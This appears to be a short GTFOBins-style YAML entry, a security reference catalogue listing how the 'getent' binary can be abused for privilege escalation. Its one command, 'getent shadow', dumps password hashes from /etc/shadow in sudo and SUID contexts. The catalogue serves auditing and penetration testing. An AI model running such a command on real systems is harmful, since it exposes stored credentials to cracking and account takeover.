Files

12 lines
201 B
Plaintext

---
functions:
privilege-escalation:
- code: |-
getent shadow
comment: |-
This allows to dump password hashes from the `/etc/shadow` file.
contexts:
sudo:
suid:
...